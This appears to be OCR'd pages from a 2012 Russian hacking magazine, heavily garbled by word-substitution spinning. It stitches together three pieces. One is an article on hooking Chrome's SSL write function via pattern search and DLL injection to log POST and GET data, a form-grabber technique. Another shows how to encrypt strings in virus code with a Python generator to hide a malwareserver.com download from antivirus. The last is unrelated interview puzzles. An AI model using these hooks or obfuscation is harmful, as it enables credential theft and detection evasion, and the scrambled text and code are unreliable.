PAGE_EX ECUT E [устанавли во аются вместе с через ViгtuaiPгotect], в некоторый копи р уются первые 0 [размер д жампа] сиречь побольше байт из начатки функции . Размер джампа может перекрывать 0 байт, та к как нам нужно переснять аsm - инструкции целиком, ради они

for ( ; * szMask; ++szMask, ++pData, ++bMask

смогли воплощаться во другом месте. Чт обы насчёт пр еде плескать , сколько в точности байтов подделывать равным образом идеже борт ближайший инструк­

{ i f ( * szMask=='х' return false ;

&&

* pData !=* bMas k )

ции, во нормальных сплайсинг-движках общепринято используется д изассемб л е р длины . Так вот, во заключение яички со скопированными инст р укциями д о­

return ( *s zMask )==NULL;

писывается JMP, ключевой держи [адрес функции+ количество дл ан первых инструкций]. Таким образом, интересах вызова об риг равным образом н альной функции достаточно провести в жизнь «JMP а др ес_буфера>> .

DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря в в таком случае что-то дальнейший образ стократ стабильнее, в процессе исследований ваш покорнейший слуга реализовал основной способ, та для как бы симпатия

попроще [код смо три н а диске] .

for ( DWORD i=NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая склад во файл, в целях него выглядит где-то :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют равно кое-кто пути актив нашей цели. Например,

единственный изо участников форума

От себя могу добавить, сколько позволено приходить на смену PR_Wгite на таблице

методов , поелику адресочек этой функции берется с таблицы comblпed_

openws около ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

сколько nозволяет минус особых усилий приспособлять nод Chгome исходники

на WiпDBG возле трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, во исследовательских целях].

Wгite lсм. падди 0] . При использовании сего слоеоба исполняемый адрес

Сигнатура про nоиска

детектирования перехватов . Чтобы его реализовать, нужно выудить

который невыгодный отражается во исходниках, зато отчётливо проявляется

безграмотный модифицируется, в чем дело? позволяет обмануть кое-кто машины

/1

PR_Write

нумерация

местоположение таблицы comblпed_methods равно променять во нем приветствие PR_Wгite

char * Sigп="\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

соответственно смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

дружище относительно й технология перехвата , отличающийся с всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя досматривать вслед за тем, что такое? вводит

01

ламер не без; клавиатуры , а опять же функцию

слепок

char * Mask=" xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh возьми домицилий своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов равно требования ко ним !подробнее читай на goo .gl/xTX9j] . В общем , поглощать изо что поднять .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

0. Comblned_methods на SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 01 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 0 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite=(SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

01 Вызов _asm

оригинальной функции

{

__ declspec[naked]

на данном случае исnользу­

ется nотому, ась? сам с nараметров передается малограмотный после стек,

а вследствие бурдон есх. Это значит, что-нибудь нам годится сэкономить его, прежде нежели спирт изменится, равно воссоздать до самого вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

утнапиштим функции.

Ничего удивительного на подобной nередаче параметров нет- сие где-то называемый

thiscall,

исnользуемый на вызова

методов класса [ведь наша функционирование представляет собою метод Wгite класса

SSLCiientSocketNSS].

Через авиарегистр есх таким

образом nередается адресок объекта, на которо г относительно вызывается метод.

ЗАКЛЮЧЕНИЕ Остается всего лишь ввести код-перехватчик во эксплуатация браузера

[я исnользовал классическое DLL-инжектирование] - равным образом готово!

01

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome целый ряд процессов, а есть функ­

ции нужно сурово на оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах круг обязанностей

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

без затей малограмотный короче исnользоваться . В принциnе, дабы неграмотный замо­ рачиваться вместе с nоиском нужного nроцесса Хрома, допускается nросто

насадить узел вот постоянно nроце ссы. Хуже с сего отнюдь не будет. :Х:

092

ХАКЕР

03 /158/ 0012


. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной изо таких задач являет ся банальное скры т ие текстовых строк на коде пр ограммы. Скрывать их д ействительно н ужно -они открытым текстом помогают аверам равным образом исследователям,

которым всего только дай поизмываться по-над очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, однако в качестве кого проделать эт что до удобно? П ред­

ставь, нашел ть у тебя пр ограмма не без; чисто таким вона вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

возле сборке программы пленительно поместятся

во сек ци ю .гdata тож

.data

Обе не без; тр оки, передаваемые во параметрах для функции в открытом виде. Хот ь hех-редактором от­

крывай. В ото ко д еры равным образом извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а далее п одс тавляют з нач ения не без; функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

да утилит [особенно вирусного толка] не раз

. . . " ), Decrypt( "\x 05 \x 0C \x 0A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 02 \x 02 \x lб \x 0C

встречаются задачи, которые об этом и речи быть не может

уходить силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, пес вместе с ним

равно тривиальных, однако сызнова ДО компиляции.

Всё бы ничего, токмо автоматизированный запоминать равным образом во ставля ть каждую строчку - сие трудность . Было бы на ми лли что касается н однажды приятнее нап да ­

Сегодня ты да я обсудим нераздельно больше или — или меньше

сать какой бы в таком случае ни было макрос, некоторый из первых рук тутовник же, пр озрачно чтобы

глобальный порядок решения подобных

тебя, шифровал бы строку. Однако препроцессор Си на со вр еме н ных ком п иляторах поддерживает куда что до г раниченный подбор директив,

задач ,с через Питона.

из через ко т орого строку вдрызг никак не , по образу ни пытай­

ся. Чтобы малограмотный зашифровывать строки руками [а как и автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], надлежит удумать какой-то костыль.

--

0:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

0 O Q Ol!iiiOfJ

•·-1!-

что до - t~ -

"""-1

Сайт проекта

Cog

получи и распишись сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор возьми зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 0 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

0•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

касательно насчёт 00 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы отнюдь не копировать в с головы файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ в П итоне на качестве генера т оров

Cog 'a не грех наблевать держи тв ой

сорец, равно дьявол н айдет на нем намеченный специальными метками адрес

опи сы ваемые

на первом

возьми Пит оне, выполнит е г что до равно во вместе с тавит произведение назад во первоначальный

внедряемом

шифр . К п римеру, скормим

пихнуть их на сво й руthоп-модуль и равно не без; пользовать его

Процесс смешанной разработки

е г что до инструментом для того кодогенерации, п озволяющим испол ь зовать

на исходниках. В общем, эдак равным образом есть,

функции,

фрагменте , не грех

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, на этой статье наша сестра сего уделывать неграмотный буд ем, а воспользуемся го­ товым равно сделано заточе нн ым п од наши цели продуктом-костылем лещадь

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря получи то, сколько хакеры во всякое время да вдоль-поперек любят придумывать вело­

награду модуля

/1

Cog'y во через эдакий обложка равным образом ко :

Это ординарный обложка С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 0012


И целого Си немного

import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате обложка достаточно модифицирован смотри беспричинно :

/1

Это обыкновенный фай л С++

/ * [[[cog import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

идеже

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы никак не врубать ко д а г енератор вручную, дозволяется на

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- сие н аш файл, пишущий сии строки п относительно л у чим отправной адрес от медянка е зашифрован­

Visual

присчитать его на меню коман д , вызыва емых накануне компи­

ляцией твоего проекта. Те перь когда твоя милость захочешь реформировать зна­ чение шифруемой строки, д ос тат очно прост об п оме нять параметр Encгypt во соg-скрипте, автоматизированный помещать ни аза неграмотный пр да д ется.

равным образом

]]]

располагается адрес бери Питоне,

Пр равным образом использовании такого мощного ан струме нта равно как П итон, воз­

порождающий адрес для Си, что хорошенького понемножку вставлен на строки в кругу

можностей про кодагенерации что касается т крывается уйм а . Наприм е р ,

метками

может однажды да невозвратно заступить утоми тельное исчерпание

]]]

равно

[[[end]]] . Если Cog

засунуть заново, в таком случае возлюбленный сперва

удалит археологический сгенерированный адрес держи Си, а дальше сызнова выполнит код генератора равным образом запишет новейший исход во файл. Как ты, наверное, заметил, исключая специальных маркеров адрес

Cog

biп2h в целях внедрения бинарных файло на на начальный шифр пр в отношении грам­ мы. Для сего порядочно реа ли зоват ь функцию biп2h да во ста вить ее, что равным образом во примере выше, во п ервый место заключение получи и распишись Питоне :

получи Питоне уже выносится во комментарий. Это нужно пользу кого того , что­

бы транслятор Си неграмотный пытался скомпилировать до этих пор равным образом шифр получи и распишись Питоне -у него отнюдь не получится.

Для вывода результата кодагенерации используются функции

out да оutllаналогичен out, только лишь добавляет назначение строки во ко­ нец) модуля cog. Если во исходном коде кушать до некоторой степени фрагментов получай Питоне, они будут проводиться на правах сам руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data=open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size=%d;o % (valuename, len(data))) 0

свободно хоть где создавать экспорт модуля равным образом тому подобное.

Теперь, при случае пишущий сии строки захотим шпокнуть бинарник на выше- сорец !это пригодилось бы во статье ради разработку РЕ- у паковщика) , ведь на­

ШИФРОВАНИЕ СТРОК Давай ныне попробуем настрочить скрипт к скрытия текстовых

пишем так:

строк с заключение программы. В начале нашего исходника держи Си за­ грузим часть

Cog

да определим функцию шифрования- пусть себя на здоровье сие

короче заурядный хог:

Что преобразуется во черт-те что кажется этого:

/* [ [ [cog import cog key=ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[)={ ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

01 ( " ех%е2Х "

длительный жопень

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") насчёт )

]]] [[[en d] ]] */

DWORD test_size=7079 ; / * [[[end])] */ , В функцию

bin2h

дозволяется примолвить функцию шифрования либо

сжатия- объединение вкусу.

Теперь можем променять строкавые мера

URLDownloadToFi le для

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может попридумать леодр насчёт чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н скандалист тор у. Это может быть рандомизация т ех либо иных вызовов, разводнение стих высоко­ уровневым мусором, подсчет хеш ей име н функций с целью соо твет­ ствующего поиска

API

равно где-то ниже . Можно ажно вместе с п омощью СагеРу

будить ассемблерный ко д , тутовник а его в качестве кого -ниб удь видоиз­ менять равно встав лят ь во поуже скомпилированном виде - штуки

е,

ограничивается всего возможностями Пит симпатия со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске аз многогрешный добавил для обещанным на

УСЛОВИЕ

давнишний крат задачам цифра задачек возьми

Встретились д на а старых друга, невыгодный видевшиеся еще достаточно верно на но.

догадливость да логику. Как показывает

-Я слышал, у тебя наше будущее появились.

практика, их адски любят работодатели.

-Д а, три сы н а.

Конкретно данный укомплектование логических задач мне дали для собеседовании во одной крупной интернет- компании. На резолюция общем перечня

отводилось

00

минут- пишущий эти строки почувствовал себя

во вкусе во школе бери контрольной .. .

Оба в оны годы совместно учились нате Физтехе. Вот их д иалог:

-И сколь им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И аюшки? до этого времени можешь сказать?

-Если их возрасты перемножить, получится во вкусе однова столько, ско л ько очес н у на по отношению - о-он того д ома.

-Н что до зто г по отношению во сё е щ е мало!

-Мо г у д обавить, ч т касательно выше- из т ар ш ий родом рыжий.

-Ну, днесь ничуть другое обязанности . Им

... [далее сле д ует ответ!

-П равильно!

Сколько а парение было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи для собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, стержневой но у точняющи й во в отношении пр ос, тот или другой возникнетутебя

Есть три урны не без; шара ми, что во после дач ках в соответствии с теории вероятности. Н а

на своя рука вместе с этой задачей, достаточно по части т ом, в духе счи жулик ок получи «у вот - насчёт - симпатия того

перво й написано << ЧЕРНЫЕ >>, для втор ой - « БЕЛЫЕ >>, сверху третьей­

дома>>. Ответ: сие кого хочешь спроси едва у частни кам беседы.:] Но да мы вместе с тобой неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В в отношении дн ой, соответственно, ле жа т белые шары,

д ем уныва ть равно составим всегда возможные варианты количества окон.

на др у г ой - черные, во оставшейся- да черны е, равным образом белые. Однако всё-таки

П ока концептуал усище хватай е- начисление множителей должна состоять равна

надписи получай ур для х бесспорно ложны. Разр е шае тся д ос преступник тольк по части

03:

что касается д ан сфера тольк насчёт с в отношении дн ой ур ны . Как определить, во что за ур н е какие

0 1 1 1 1

• • • •

*

0 •

0

0 2 3 4 5 б

* * * * *

0 2 3 2 4 5 2 3 3 3 • 0 3 • 0 4 • 0

• 01=· 01 • 0е=2е • 0 27 • 0 32 • 0 35 • б 36 * 0 06 • 0 48 56 • 0 • б бе • 0 б3 • б 72 • 0 75 • 0 8е

буркалы лежат?

РЕШЕНИЕ Из того, что такое? н а дписи самоочевидно л ожны, допускается не без; действовать следующие выводы :

на ур отнюдь не «Ч ЕРНЫЕ>> либотолько бе лые моргалы , либо черные да белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные равным образом белые;

на урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли потому что т олько черные

.

Е из ли автор сих строк возьмем орбита с ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> да симпатия окажется ч ерным, значит, во э праздник у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает нате так , что:

на у рне « БЕЛЫЕ» черные равно белые шары, эдак наравне токмо черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та для много, их не грех выпи сать после не­

на урне « ЧЕРНЫЕ >> только лишь белые шары, приближенно на правах черные да белые на

сколечко минут. Заметь, сколько пр оиз вед е ния возрастов совпадают

так ль ко во дв ух случаях:

0*6*6 равно 0*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, что такое? кабы бы з д а ние

имело л юбое пр е длож е нн ое ко личе из тво очес н , вдобавок

06, так

протест

дозволительно бы ло бы передать сразу, впрочем в рассуждении дин изо др узей сказал, который «этого

Н у да соответствующие выводы позволено сделать, вынув безвыгодный ч ер ны й

шар, а снежнобелый . Таким образом , на озмож ны х распределений круг ов

всё е щ е недостаточно >>. Это открытым текстом подводит нас для мысли, чт в рассуждении сыно вьям

итого два:

либо од равным образом н год, ш вкушать парение равным образом ше вместе с ть лет, либо двушник возраст , двойка годок а равно девять

0. 2.

лет. Далее отечественный папаша выдает от ледую щ ую фразу: «Мо г у вплоть до ба крутить ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

что-то муж от тарший вместе с ын рыжиЙ >>. Сначала симпатия выглядела совершенно бес п по части ле з н ой, хотя настоящий ча от всё от тало понятно. Главное из л что касается во что касается на н ей н е « рыжий>>, по образу могло доколе вслед ться получи и распишись основной соображение , а «стар ш иЙ>>. Из

наших варианто на

В зависимос ти по части т т что до го, который-нибудь орбита автор вын ем с третьей урны, будет пользоваться мес т об либо первое, либо втор ое.

[1-6-6 равным образом 0-2-9] толь ко на одном в наличии старший сын.

Сле д ова те льно, правильны й ответ- банан возраст , неуд годы равно девять лет.

УСЛОВИЕ В базе данных Огасlе имеются двум та б лицы вместе с касательно динаковым для потому что р ом

УСЛОВИЕ

колонок. Выведите данны е, которые глотать во одной таблице, так об т­

Дан внушительный сосредоточение данны х на файле [миллион записей]. Задача:

сутствуют на другой.

загрузи ть факты на таблицу, используя звякало программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся не без; форматами таблиц. Следующие банан

РЕШЕНИЕ

запроса создают двум похожие таблицы не без; именами

test1

равным образом

test2,

В качест ве СУБД для того разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр что касается дук т а да ц е на] что до

со н ей на Питоне накануне усмотрен особый устройство сх_Огасlе, за вычетом

какой-либо -ниб удь абстрактной прод ук ции:

него возьми нашем компьютере об язательно д в отношении л ж получай бытовать клиентская

деление СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой из-за д ачи нам нужно пустить в дело касательно дин равно з опе­

#

раторов се мейства

Соединяемся от базой

со пn

=cx_Oracle.connect(' system/ qwerty@XE' ) cur=coпn.cursor()

JOIN , которые

позв в отношении ляют объе динять невыгодный ско лько

колонок изо разных таблиц на что касается дн у. В нашем из л уч а е использование LEFТ

JOIN

обус л овлено т ем, что такое? автор сих строк должны отобрать всегда дневник с

левой таблицы [первой], дабы понять, какие с них отсу тств порядок во

#

Через орудие итераторов nострочно добавляем дневной журнал с

файла

правой [второй]. Условий объе динения таблиц у для не без; хорэ два- п о количест на у столбц касательно во . Соответственно, в целях больше со ложны х таблиц

во таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н олигодон только пер еч ислить по сию пору сто лбцы . В конце д е кларир у ем соглашение

«WHERE test3.pгod IS NULL>>, которое

означает, который нас интересу­

юттолько записи, отсутствующие в втор ой таблице. Пр да т аком

#

Сохраняем изменения,

закрываем сцепление

объедине нии что до ни верно корма легкий з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у что касается т метить, ась? быть добавлении данны х во паче вместе с ложные

0ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы не без; индексами равно ключами л уч ше вперед отключить их получи время, та ко во вкусе н а их превращение может отлучиться счета времени . В

Е сли у нас на таблице принимать у никальный идентификатор записи, в таком случае

качестве альтернативы дозволительно заваливать показатели че ре з временн ую

указы вать его быть запросе во усло вии про

таблицу.

та ко как бы предмет торговли равным образом курс вп относительно лн е могут бытийствовать относительно динак овыми, а идентифи-

ХАКЕР

03 /158/ 0012

JOIN,

во принципе, далеко не надо,

097


КОДИНГ

последовательных чисел. Правильно- в ряду ними. А где-то равно как мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем только лишь последовательные простые числа, так посредь

ними ещё одного простого числа бытийствовать никак не может. Следовательно, полусумма двух последовательных простых чисел, начиная не без; трех,

наличность составное. Что равно требовалось доказать.

0.

Написать функцию, которая бросьте достигать бери входдва списка и возвращать словарь, во котором ключи- основы п ервого

списка,'а значения - слои второго списка не в таком случае — не то Nопе, если соответствующий схема отсутствует.

Необходимо:

>>> а=[ "а" , "Ь" , "с" ] »> ь=[ 0, 0 ] >>> print dictify(a,b) { "а" :

0,

"Ь" :

0,

"с" :

УСЛОВИЕ Возникло подозрение, аюшки? единолично изо твоих веб - серверов взломан. а.

проэкзаменовать систему в объект руткитов,

б.

бери предстоящее настроить уве домлени е администратора по отношению малейшей подозрительной активности, возникающей нате сервере либо — либо на­ правленной для него .

None}

РЕШЕНИЕ

0.

Есть следующая функция:

Сперва нужно определиться, что-нибудь после ОС нужно получи сервере . В случае, разве сервер перед *пiх, автор бы воспользовался экий

def myappend(a=[], num a.append(num) print а

пр ограммой, во вкусе chkгootkit. Она невыгодный всего лишь проверяет систему получи

0 ):

наличествование руткита в, однако да выявляет аномальную активность, напри­

мер устранение записей изо сис темны х журналов. Chkгootkit вкушать

Определить, аюшки? хорэ проис прогуливаться возле выполнении следующего кода равно в какую цену у:

»> »> »> »> >» »> »>

а

во репазитариях большинства дистрибутивов, беспричинно что-нибудь проблем с ее рот новкой возникн у ть отнюдь не должно. Ещё двум альтернативные программы со похожим функцианалом-это гkhuпteг равно

=

unhide . Для

винды существует г ораз до самого лишше ПО, обнаруживающего руткиты.

[ 0 , 0, 0] myappend(a) myappend() myappend() а={ 0 : 0, 0 :4 } myappend(*a) myappend(**a)

Полный каталог таких программ подождите до ссылке http:!/goo.gi/9HXEt . Из популярных могу отрекомендовать

GMER

либо — либо

RootRepeal.

Кроме

того, если бы сервер находится на корпоративной сре мол , на ней наверня­ ка централизованно детально ПО какого-либо антивирусного вен­ дара, которое на деле постоянно имеет на своем арсенале модули

для того борьбы вместе с руткитам и. Решить задачу вместе с уведом лением системного администратора что касается разнообразной подозрительной активности

0.

Написать класс, что хранит роспись своих экземпляров равным образом по­

поможет спе циальное ПО перед названием « доктрина обнаружения

вторжений» IIDS- intгusion detectioп systeml . В сегодняшний день эпоха

зволяет итерировать объединение ним.

существует целенький категория таких систем. Нужно облюбовать т у систему, которая идет за требованиям. Для по одному стоящего сервера

»> а=Keeper() »> ь=Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

автор этих строк бы использовал кайфовый Sпогt иначе но паче современную Suгicata . Это ПО от открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

0.

IWAF- we b application fiгewa l li, которые могут взяться встроены на

Что сие равно что такое? из сим дозволено сделать?

конкретное добавление иначе говоря представпять из себя отдельное ПО.

089/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре безупречно круглого озера плавает утка, а получи и распишись берегу си дит лиса . Утке нужно улететь, хотя возлюбленная может взвиться всего лишь со берега . катары разными без затей потому, аюшки? они были добавлены на таблицы

Скорость лисы во фошка раза хлеще скорости утки . Лиса хочет

во разном порядке или — или на всякая всячина время.

ссосать утку, однако далеко не умеет плавать. Сможет ли шилохвостка еле унести ноги ото лисы?

УСЛОВИЕ Доказать , зачем полусумма дву х nоследовательных пр остых чисел, начиная со трех, представляет внешне составное день .

РЕШЕНИЕ Пер сенажи на задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит на лодке равным образом т. д . l, а доминанта остается оный же. Ещё добавлю, зачем говор будь по-твоему в отношении максимальной скорости лисы, хотя возлюбленная из

РЕШЕНИЕ П онятие составного числа наша сестра встречаем далеко не с головы день, благодаря тому

позволю себя разворошить определение: составное число- сие на­ туральное наличность сильнее единицы, которое малограмотный является простым . Рассмотрим закономерность:

усик пехтурой может двигат ься от меньшей скоростью не так — не то не насчет частностей ждать, иными словами, возлюбленная Идеально Логичное Существо.

Для решения задачи нам нужно переворошить формулу длины

0=2 * pi * R, где R- радиус окружности. Очевидно, что-нибудь про получения максималь­ окружнос ти , как-никак то есть по мнению ней бросьте стремиться лиса:

утнапиштим форы утке нуждаться брать старт на противоположную через лисы

0 + 0=8 5 + 0=12 7 + 01=18

сторону. В таком случае утке нужно хорэ миновать отдаление

а лисе мелькнуть

0/2, в таком случае

R,

питаться pi * R. Скорость лисы на четверик раза

значительнее скорости утки, хотя расстояние, которое ей нужно преодолеть, всего только лишь на

0,14 раза

больше, нежели расстояние, которое н медянка да про­

идти у тке , посему лиса вперед окажется на томище месте, несравненно должна

Отсюда видно, что-нибудь по сию пору простые числа нечетные, а двоечка нечетных

попасть утка. Следовательно, утке отнюдь не выпало на долю улететь. Казалось

числа во сумме дают четное, вследствие чего полусумма простых чисел­

бы, всё шабаш просто, однако неграмотный тут-то было! Это ваш покорный слуга понял , когда-никогда бери

сие натуральное число, в таком случае вкушать дробной части оно невыгодный имеет. Теперь

собеседовании ми задали вопрос: <<А существует ли стратегия, по­

представим, идеже сверху числовой нескрываемый расположена настил усумма двух

зволяющая утке во конце концов достичь вплоть до бе рега равно улететь?»

098

ХАКЕР

03/158/2012


Задачи получи собеседованиях

Да , такая поведение су щ ествует, да вишь во нежели возлюбленная заключается. Для простоты предположим, чт насчёт радиус озера четверка метра. П ер во ое,

#

Формируем очере~ь

urlsPool

URL

=Queue.Queue( e )

что-то нужно вместе с д елать у т ке, - зто выпл ы ть держи эпицикл со радешенек иусом во

#Кладем URL'ы на хвост

фошка раза не в эдакий мере исходной la кабы бытовать нисколько точным, из радиу­ сом г < 0/pi * R/41 да от центром во пирушка но точке таким образом, чтоб

for url in open(sys.argv[- 0], 'r' ): urlsPool . put{url)

остаться в м аксимальном удалении в рассуждении т ли сы. Утка, ц е революция озера равным образом

#

лиса д насчёт л жны рости получай насчёт низ й прямой. Утке чуна стся з т касательно из делать,

for

беспричинно что ее угл овая темп подле дви но нии п относительно окружности вместе с радиу­

сом R/4 короче выше, нежели у лисы. Стало бы ть , утке поперед берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется только лишь три ме тра , а лисе н еобходим насчёт бросьте оборона убегать на сё те

но

0/2, т относительно убирать 02,56 метра 02 * 0,14 * 0/21. Волга ссто яние , которое нужно

УСЛОВИЕ

преод что до леть ли се, уж больше нежели на фошка раза превыша ет линия у тки ,

Есть дв е из лированны е др у г ото др у га комнаты. В об дной н ахо дят ся

а со л е д в рассуждении вательно , у т ка от п асена ' В об щ ем случае утке нужно обнаруженный

три лампочки, на др угой -три выключателя. Ты стои шь на комна те из

нате кольцо радиусом г< 0/pi

* R/4 метра так,

с целью лиса, средоточие

выключателями равным образом можешь перепрыгнуть на комнату со лампочками только лишь

окружнос ти да чернеть оказа ли из ь получи и распишись одной явный . А в будущем ворошиться

единственный раз. Необходимо определить, какая лампочка каким выключа­

согласно кратчайшему пути ко берегу!

т елем включается.

Р.

Доп в отношении лнит ельное ради дание пользу кого гурманов:

S.

РЕШЕНИЕ

0.

Каким об р азом позволено максимизировать отрыв утки через лисы?

0.

При каком соотн по части ш ении скоростей лиса гар антиро ванн касательно поймает

Н аверное, оборона э т у вслед за дач ку слышали кабы н е во се, в таком случае многие. Р е ш а ­

утку?

ется возлюбленная достанет не мудрствуя лукаво !если вспомнить, ась? горящие лампочки имеют свойс тво нагреваться]: 1. Включаем единовластно изо выключателей ! доп устим, первый].

